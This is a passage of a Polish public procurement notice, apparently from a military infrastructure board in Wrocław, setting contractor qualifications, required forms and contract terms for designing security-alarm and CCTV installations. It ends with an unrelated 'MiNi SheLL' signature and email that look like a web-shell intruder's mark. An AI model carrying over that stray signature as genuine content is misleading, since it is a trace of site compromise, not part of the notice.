Osoby, które przed dniem wejścia w życie ustawy tj. 1 stycznia 1995 r. (Ustawa z dnia 7 lipca 1994 r. Prawo budowlane - tekst jednolity Dz. U. z 2010 r. Nr 243 poz. 1623 z późniejszymi zmianami - art. 104), uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego 
do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie.
4)	projektantem ze specjalnością drogową - bez ograniczeń. 
Osoby, które przed dniem wejścia w życie ustawy tj. 1 stycznia 1995 r. (Ustawa z dnia 7 lipca 1994 r. Prawo budowlane - tekst jednolity Dz. U. z 2010 r. Nr 243 poz. 1623 z późniejszymi zmianami - art. 104), uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego 
do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie.
5)	uprawnionym geodetą - w zakresie opracowania mapy do celów projektowych;
6)	pełnomocnikiem ds. ochrony informacji niejawnych, który musi posiadać zaświadczenie o odbyciu szkolenia w zakresie ochrony informacji niejawnych wydane przez SKW lub ABW;
7)	osobą pełniącą funkcję inspektora bezpieczeństwa teleinformatycznego, który został przeszkolony (zaświadczenie o odbyciu przeszkolenia) przez ABW lub SKW w zakresie bezpieczeństwa teleinformatycznego;
8)	osobą pełniącą funkcję administratora systemu teleinformatycznego, który został przeszkolony (zaświadczenie o odbyciu przeszkolenia) przez ABW lub SKW w zakresie systemu teleinformatycznego.
Wykonawca musi wykazać, że dysponuje osobami zdolnymi do wykonania przedmiotu zamówienia w zakresie projektowania instalacji (SSWiN, SAP,          oraz System Telewizji Obserwacyjnej), które muszą być wpisane na listę kwalifikowanych pracowników zabezpieczenia technicznego oraz posiadają legitymację pracownika zabezpieczeń technicznych wydaną przez pracodawcę. Projektanci oraz inne osoby przewidziane do realizacji przedsięwzięć ochronnych 
w obiektach wojskowych muszą posiadać upoważnienie do dostępu do informacji niejawnych o klauzuli ZASTRZEŻONE wydane przez kierownika jednostki organizacyjnej lub aktualne poświadczenie bezpieczeństwa osobowego o klauzuli 
ZASTRZEŻONE lub wyższej oraz aktualne zaświadczenie o odbyciu przeszkolenia w zakresie informacji niejawnych (ważne 5 lat) wystawione przez pełnomocnika Wykonawcy. Wykonawca musi wykazać, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Na potwierdzenie ww. warunku należy załączyć wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacją na temat 
ich kwalifikacji zawodowych, wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informację 
o podstawie do dysponowania tymi osobami (oryginał podpisany przez Wykonawcę) - Formularz nr 4
oraz oświadczenie, że osoby które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia (oryginał podpisany przez Wykonawcę) 
- Formularz nr 5. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączącego go z nimi stosunków. 
W takiej sytuacji zobowiązany jest on udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawi w tym celu pisemne zobowiązanie tych podmiotów do oddania 
mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (wzór - Formularz Nr 9). 
Podmiot, który zobowiązał się do udostępnienia zasobów odpowiada solidarnie 
z Wykonawcą za szkodę Zamawiającego powstała wskutek nieudostępnienia tych zasobów, chyba, że za nieudostępnienie zasobów nie ponosi winy.
Zobowiązanie musi przybrać formę pisemną i nie jest dopuszczalna inna forma, 
w tym kopia dokumentu potwierdzona za zgodność z oryginałem. 
W oświadczeniu podmiotu o udostępnieniu potencjału oraz wiedzy i doświadczenia należy wskazać, w jakim charakterze podmiot trzeci będzie brał udział 
w postępowaniu (np. jako podwykonawca, doradca, konsultant).

Jeżeli Wykonawca wykazując spełnienie warunku, o którym mowa 
w art. 22 ust. 1 pkt 2 Ustawy będzie polegał na wiedzy i doświadczeniu innych podmiotów na zasadach, określonych w art. 26 ust. 2b Ustawy, podmioty 
te są zobowiązane załączyć dokument, o którym mowa w pkt 1.1 ppkt 1.1.3 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>1.5.1	Wykonawca musi wykazać, że wykonał co najmniej jedno opracowanie dokumentacji projektowej na budowę/przebudowę/remont budynku o kubaturze nie mniejszej niż 8.000 m3 oraz wykazać się doświadczeniem dotyczącym minimum jednej realizacji dokumentacji projektowej budowy, rozbudowy systemów alarmowych tj. Systemów Sygnalizacji Włamania i Napadu (SSWiN), Alarmu Pożaru (SAP).;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wykonawca zobowiązany jest posiadać kancelarię tajną lub pomieszczenia umożliwiające prowadzenie prac z niejawną dokumentacji o klauzuli ZASTRZEŻONE zgodnie z opracowaną przez Wykonawcę Instrukcją sposobu i trybu przetwarzania informacji niejawnej o klauzuli ZASTRZEŻONE           oraz zakres i warunki stosowania środków bezpieczeństwa fizycznego w celu ich ochrony. W celu wykazania spełnienia ww. warunku, Wykonawca załączy do oferty stosowne oświadczenie- Formularz 8 SIWZ A</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1 informacje ogólne o Wykonawcy - Formularz Nr 1;
2. oświadczenie o spełnieniu warunków udziału w postępowaniu (oryginał podpisany przez Wykonawcę) - Formularz Nr 2; 3. propozycje ewentualnego podzlecenia elementów usług - Formularz nr 6 oraz 6a (oryginał podpisany przez Wykonawcę; 4. wycena elementów dokumentacji projektowej - Formularz nr 7; 5. oświadczenie o braku podstaw do wykluczenia (oryginał podpisany przez Wykonawcę) - Formularz Nr 2a; 6. informację o przynależności do grupy kapitałowej (oryginał podpisany przez Wykonawcę) - Formularz Nr 10.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin realizacji I etapu - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość wprowadzenia zmian do umowy w zakresie: 
1)	Terminu wykonania przedmiotu umowy w przypadku:
a)	wystąpienia okoliczności uniemożliwiających realizację nadzoru autorskiego w terminie umownym. Za okoliczności takie uważa się wstrzymanie robót przez Zamawiającego, a także wystąpienia okoliczności niezależnych 
od Wykonawcy, w tym wynikających z tzw. siły wyższej uniemożliwiających realizację przedmiotu umowy,
b)	przedłużenia, określonych w Kodeksie postępowania administracyjnego (j.t. Dz. U. z 2013, poz. 267) oraz w przepisach szczegółowych, terminów do uzyskania opinii i decyzji administracyjnych, pod warunkiem, że przedłużenie terminów nie jest zawinione przez Wykonawcę,
c)	przedłużenia czasu niezbędnego do uzyskania uzgodnień wskazanych w § 2 ust. 2,  
d)	wystąpienia konieczności dokonania dodatkowych uzgodnień w trakcie realizacji przedmiotu umowy,
e)	gdy po zawarciu umowy, nastąpi zmiana przepisów mających bezpośredni wpływ na przedmiot umowy,
f)	gdy wystąpią zdarzenia losowe w odniesieniu do osób realizujących opracowania projektowe,
g)	wydłużenia procedury o udzielenie zamówienia publicznego (spowodowanej m. in. przedłużeniem przez Zamawiającego terminu związania ofertą, wpłynięcia odwołania),
h)	pełnienia nadzoru autorskiego w związku z wydłużeniem okresu rozpoczęcia realizacji i zakończenia robót budowlanych;
2)	Wynagrodzenia Wykonawcy w przypadku:
a)	zmiany obowiązujących przepisów prawa, a w szczególności przepisów prawa podatkowego;
b)	gdy po zawarciu umowy , nastąpi zmiana przepisów mających bezpośredni wpływ na przedmiot umowy;
3)	Ilości pobytów projektanta oraz kwoty wynagrodzenia umownego w przypadku wystąpienia takiej konieczności z przyczyn niezależnych od stron.
2.	Wszelkie zmiany do niniejszej umowy wymagają pod rygorem nieważności zachowania formy pisemnej w formie aneksu.
3.	Wykonawca zobowiązuje się do informowania Zamawiającego o zmianie formy prowadzonej działalności oraz zmianie adresu siedziby firmy i zamieszkania jej właściciela, pod rygorem uznania korespondencji kierowanej na ostatni podany przez Wykonawcę adres za doręczony. Powyższe zobowiązanie dotyczy okresu obowiązywania umowy, rękojmi gwarancji oraz nie zakończonych rozliczeń wynikających z umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rziwroclaw.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejonowy Zarząd Infrastruktury, ul. Obornicka 126, 50-984 Wrocław - pok. 27.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2015 godzina 10:00, miejsce: Rejonowy Zarząd Infrastruktury, ul. Obornicka 126, 50-984 Wrocław - kancelaria pok. 101.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com